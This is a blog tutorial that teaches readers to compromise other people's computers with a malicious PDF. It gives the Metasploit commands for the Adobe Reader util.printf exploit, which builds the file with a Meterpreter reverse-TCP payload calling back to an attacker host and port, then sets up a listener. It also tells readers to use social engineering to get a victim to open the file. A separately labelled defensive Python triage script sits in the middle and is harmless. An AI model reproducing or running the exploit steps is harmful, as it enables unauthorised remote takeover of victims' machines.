Sunday 16 November 2014

Hack anyone's computer by using malicious PDF

In this tutorial I will show you how to create a malicious PDF file and hack anyone's computer by exploiting the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.

Adobe Reader is vulnerable to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
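
For defenders, a triage check for documents of this kind, as an added example that is not part of the original post: it flags PDFs that carry JavaScript name tokens (including #XX-obfuscated names) and any call to util.printf() in plain or Flate-compressed streams. The function names and sample documents are constructed for illustration, and the embedded script is a harmless call.

```python
import re
import zlib

# PDF name tokens that mark embedded or auto-run JavaScript.
NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)
PRINTF_RE = re.compile(rb"util\s*\.\s*printf\s*\(")

def normalize_names(data: bytes) -> bytes:
    """Decode #XX escapes so an obfuscated /J#61vaScript matches /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def decoded_streams(data: bytes):
    """Yield each stream body, inflated when it is zlib (FlateDecode) data."""
    for match in STREAM_RE.finditer(data):
        body = match.group(1)
        try:
            # decompressobj ignores the end-of-line bytes left after the data
            yield zlib.decompressobj().decompress(body)
        except zlib.error:
            yield body  # not Flate-compressed: scan the raw bytes

def triage_pdf(data: bytes) -> dict:
    """Report JavaScript markers and util.printf() calls found in a PDF."""
    norm = normalize_names(data)
    names = sorted(n.decode() for n in NAMES
                   if re.search(re.escape(n) + rb"(?![A-Za-z])", norm))
    calls = bool(PRINTF_RE.search(data)) or any(
        PRINTF_RE.search(s) for s in decoded_streams(data))
    has_js = "/JS" in names or "/JavaScript" in names
    return {"names": names, "util_printf": calls, "suspicious": calls or has_js}

def build_sample(js: bytes) -> bytes:
    """Constructed sample: obfuscated names plus one Flate stream of script."""
    body = zlib.compress(js)
    head = (b"%PDF-1.4\n1 0 obj\n<< /OpenAction 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< /S /J#61vaScript /J#53 3 0 R >>\nendobj\n"
            b"3 0 obj\n<< /Filter /FlateDecode /Length ")
    return (head + str(len(body)).encode() + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n%%EOF\n")

SAMPLE_FLAGGED = build_sample(b'util.printf("%d", 1);')  # harmless call
SAMPLE_CLEAN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_FLAGGED))
    print(triage_pdf(SAMPLE_CLEAN))
```

This is a byte-level heuristic, not a PDF parser: it does not follow object streams or filters other than Flate, so a clean result does not prove a file is safe.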


Our first step is to create a malicious PDF. For this we can use the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.

msf exploit(adobe_utilprintf) > set FILENAME adobereaderexploit.pdf
set FILENAME – sets the name of the malicious PDF file that gets created

msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
set PAYLOAD – allows you to set the specific payload for your exploit

msf exploit(adobe_utilprintf) > set LHOST 192.168.57.78
set LHOST – allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell

msf exploit(adobe_utilprintf) > set LPORT 4455
set LPORT – allows you to set the port for the reverse communications needed to open the reverse command shell

msf exploit(adobe_utilprintf) > show options
show options – shows the various parameters for the specific exploit you're working with

msf exploit(adobe_utilprintf) > exploit

Here we can see that Metasploit saves the PDF in a default location, so we need to move the PDF file from the saved location to our desired location for future use.

Now that we have created a malicious PDF file, we need to create a listener before sending it to our victim.

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.57.78

msf exploit(handler) > set LPORT 4455

msf exploit(handler) > exploit


Now that we have a malicious PDF file and our listener is ready, we need to use our social engineering skills to send this malicious PDF file to our victim.


Now, as you can see, when the victim opens our malicious PDF file we get the meterpreter session. In this way we can hack anyone's computer and do whatever we want to do.
